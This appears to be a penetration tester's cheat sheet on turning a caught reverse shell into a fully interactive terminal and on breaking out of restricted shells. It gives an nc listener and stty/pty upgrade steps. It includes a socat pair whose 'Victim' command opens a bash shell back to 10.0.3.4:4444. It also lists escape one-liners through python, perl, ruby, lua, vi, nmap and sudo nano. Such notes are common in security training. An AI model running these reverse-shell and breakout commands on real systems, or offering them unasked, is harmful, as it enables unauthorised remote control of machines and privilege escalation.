Get an Interactive Shell - Best

run the payload

nc -nvlp 3333  /after getting the shell 

python -c 'import pty; pty.spawn("/bin/bash")' 

ctrl+Z   /background the process

echo $TERM  /examine the terminal & Copy the output

stty -a   /get number of rows & columns;copy it 


/The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 38; columns 116")


stty raw -echo   

/With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command

/you wont see any thing just type the next command 

fg   /foreground the nc shell

reset   /reinitialize the terminal with reset.

/Type the Following commands in NC shell

export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 116


now enjoy auto complete,history,job control

BYPASS RESTRICTED SHELL BY SHELLcartaraz

Using Python for a psuedo terminal
python -c 'import pty; pty.spawn("/bin/bash")'  


Using socat
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444  


Using stty options
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh" 
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell 
(From within nmap)
!sh 
sudo /etc/nano filename
^R^X
reset; sh 1>&0 2>&0